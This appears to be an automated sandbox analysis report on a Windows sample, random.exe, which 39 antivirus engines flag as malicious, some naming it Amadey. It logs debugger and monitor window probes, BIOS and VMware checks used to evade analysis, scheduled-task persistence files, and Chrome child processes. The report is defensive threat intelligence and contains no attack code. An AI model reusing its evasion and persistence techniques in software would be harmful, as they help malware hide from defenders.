FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Sept. 2, 2024, 10:59 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Sept. 2, 2024, 10:59 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Sept. 2, 2024, 10:59 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Sept. 2, 2024, 10:59 a.m.	class_name: FilemonClass window_name:		0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Installs itself for autorun at Windows startup (2 events)

file	C:\Windows\Tasks\svoutse.job
file	C:\Windows\Tasks\explorti.job

One or more non-whitelisted processes were created (33 events)

parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=4168 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2112 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=5016 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=4424 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2584 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1144,11122981970312417987,10966360546989276489,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=6D2B6E00A5B5092A2D4B90B3AC6B3C74 --mojo-platform-channel-handle=1156 --ignored=" --type=renderer " /prefetch:2
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2844 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3500 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1100,7943615078195971890,11349820179221897514,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=B8C9434EDAD4AE41BEEE63471C0EC35E --mojo-platform-channel-handle=1120 --ignored=" --type=renderer " /prefetch:2
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=300 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2232 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3784 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3132 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=4776 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2988 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=4080 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2192 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 50 c7 04 24 8d 65 25 5f exception.symbol: random+0x1fe1a3 exception.instruction: in eax, dx exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2089379 exception.address: 0x134e1a3 registers.esp: 3210180 registers.edi: 5975576 registers.eax: 1447909480 registers.ebp: 4008620052 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 20219566 registers.ecx: 20	1	0	0

File has been identified by 39 AntiVirus engines on VirusTotal as malicious (39 events)

Bkav	W32.AIDetectMalware
Elastic	malicious (high confidence)
Cynet	Malicious (score: 99)
Skyhigh	BehavesLike.Win32.Generic.tc
ALYac	Gen:Variant.Kryptik.260
Cylance	Unsafe
VIPRE	Gen:Variant.Kryptik.260
Cybereason	malicious.5d305d
Arcabit	Trojan.Kryptik.260
Symantec	ML.Attribute.HighConfidence
tehtris	Generic.Malware
ESET-NOD32	a variant of Win32/Packed.Themida.HZB
APEX	Malicious
McAfee	Themida-FWSE!457D9A15D305
Kaspersky	HEUR:Trojan.Win32.Generic
BitDefender	Gen:Variant.Kryptik.260
MicroWorld-eScan	Gen:Variant.Kryptik.260
Rising	Spyware.Stealer!8.3090 (TFE:2:saNJG1dAbSP)
Emsisoft	Gen:Variant.Kryptik.260 (B)
F-Secure	Trojan.TR/Crypt.TPM.Gen
McAfeeD	Real Protect-LS!457D9A15D305
Trapmine	malicious.moderate.ml.score
FireEye	Generic.mg.457d9a15d305df62
Sophos	Generic ML PUA (PUA)
SentinelOne	Static AI - Malicious PE
Google	Detected
Avira	TR/Crypt.TPM.Gen
MAX	malware (ai score=88)
Gridinsoft	Trojan.Heur!.038120A1
ZoneAlarm	HEUR:Trojan.Win32.Generic
GData	Gen:Variant.Kryptik.260
Varist	W32/Agent.JDU.gen!Eldorado
AhnLab-V3	Trojan/Win.Generic.R645974
BitDefenderTheta	Gen:NN.ZexaF.36812.ZDWaaCwuSBbi
DeepInstinct	MALICIOUS
Malwarebytes	Trojan.Amadey
Zoner	Probably Heur.ExeHeaderL
Fortinet	W32/Themida.HZB!tr
CrowdStrike	win/malicious_confidence_90% (D)

random.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All